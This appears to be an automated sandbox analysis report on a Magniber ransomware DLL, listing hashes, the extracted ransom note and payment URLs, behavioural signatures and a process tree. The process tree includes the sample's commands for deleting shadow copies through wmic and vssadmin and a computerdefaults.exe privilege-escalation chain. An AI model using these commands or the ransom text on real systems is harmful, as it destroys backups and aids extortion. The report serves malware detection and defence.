Analysis

  • max time kernel
    138s
  • max time network
    122s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    24-11-2021 05:42

General

  • Target

    fabubbjd.inf.dll

  • Size

    39KB

  • MD5

    b086c689ad65afd62dadcf6a1fb799a3

  • SHA1

    de77db799a7bc43bb7c6208cfdd58e8457cf1061

  • SHA256

    612cd74d2ed040ec2958e78ae80b39231f4eb130e2ddb74c8d90a2c1fddd1fa0

  • SHA512

    1b3ba45981151b5c8e89f93b84fdf0ce54e2d9bbbfa18bc2e0d0af2e3dccb4dc6d070640c6b3c7970c1c9d2bb2c109bfce12f99cd402975ae97982f6fa680aca

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://166ca4208a7ca270eectzpapmiv.3g5twxggjkc76oy6itmdvhliayffjfv23vg3rp372nn7ohfnnylfclid.onion/ctzpapmiv Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://166ca4208a7ca270eectzpapmiv.vansban.space/ctzpapmiv http://166ca4208a7ca270eectzpapmiv.hemore.uno/ctzpapmiv http://166ca4208a7ca270eectzpapmiv.trapbe.quest/ctzpapmiv http://166ca4208a7ca270eectzpapmiv.hotgame.fit/ctzpapmiv Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://166ca4208a7ca270eectzpapmiv.3g5twxggjkc76oy6itmdvhliayffjfv23vg3rp372nn7ohfnnylfclid.onion/ctzpapmiv

http://166ca4208a7ca270eectzpapmiv.vansban.space/ctzpapmiv

http://166ca4208a7ca270eectzpapmiv.hemore.uno/ctzpapmiv

http://166ca4208a7ca270eectzpapmiv.trapbe.quest/ctzpapmiv

http://166ca4208a7ca270eectzpapmiv.hotgame.fit/ctzpapmiv

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fabubbjd.inf.dll,#1
    1⤵
    • Modifies extensions of user files
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2720
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:368
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://166ca4208a7ca270eectzpapmiv.vansban.space/ctzpapmiv^&1^&35060599^&59^&255^&2215063"
      2⤵
      • Checks computer location settings
      PID:2584
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3220
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3176
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
        3⤵
          PID:1364
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3688
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
          3⤵
            PID:1532
      • C:\Windows\system32\cmd.exe
        cmd /c computerdefaults.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\system32\ComputerDefaults.exe
          computerdefaults.exe
          2⤵
            PID:2368
        • C:\Windows\system32\cmd.exe
          cmd /c computerdefaults.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:3032
          • C:\Windows\system32\ComputerDefaults.exe
            computerdefaults.exe
            2⤵
              PID:2732
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe Delete Shadows /all /quiet
            1⤵
            • Process spawned unexpected child process
            • Interacts with shadow copies
            PID:876
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
              PID:2160
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
              1⤵
              • Drops file in Windows directory
              • Modifies Internet Explorer settings
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:1348
            • C:\Windows\system32\browser_broker.exe
              C:\Windows\system32\browser_broker.exe -Embedding
              1⤵
              • Modifies Internet Explorer settings
              PID:1412
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:1056
            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
              1⤵
              • Drops file in Windows directory
              • Modifies Internet Explorer settings
              • Modifies registry class
              PID:3184

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2720-126-0x00000261AD180000-0x00000261AD181000-memory.dmp

              Filesize

              4KB

            • memory/2720-121-0x00000261AD000000-0x00000261AD001000-memory.dmp

              Filesize

              4KB

            • memory/2720-122-0x00000261AD010000-0x00000261AD011000-memory.dmp

              Filesize

              4KB

            • memory/2720-125-0x00000261AD170000-0x00000261AD171000-memory.dmp

              Filesize

              4KB

            • memory/2720-124-0x00000261AD160000-0x00000261AD161000-memory.dmp

              Filesize

              4KB

            • memory/2720-127-0x00000261B06C0000-0x00000261B06C1000-memory.dmp

              Filesize

              4KB

            • memory/2720-116-0x00000261ACFB0000-0x00000261ACFB1000-memory.dmp

              Filesize

              4KB

            • memory/2720-128-0x00000261B06D0000-0x00000261B06D5000-memory.dmp

              Filesize

              20KB

            • memory/2720-120-0x00000261ACFF0000-0x00000261ACFF1000-memory.dmp

              Filesize

              4KB

            • memory/2720-123-0x00000261AD150000-0x00000261AD151000-memory.dmp

              Filesize

              4KB

            • memory/2720-118-0x00000261ACFD0000-0x00000261ACFD1000-memory.dmp

              Filesize

              4KB

            • memory/2720-115-0x00000261ACFA0000-0x00000261ACFA5000-memory.dmp

              Filesize

              20KB

            • memory/2720-136-0x00000261B21F0000-0x00000261B21F1000-memory.dmp

              Filesize

              4KB

            • memory/2720-117-0x00000261ACFC0000-0x00000261ACFC1000-memory.dmp

              Filesize

              4KB

            • memory/2720-119-0x00000261ACFE0000-0x00000261ACFE1000-memory.dmp

              Filesize

              4KB

            • memory/3728-140-0x0000023091970000-0x0000023091978000-memory.dmp

              Filesize

              32KB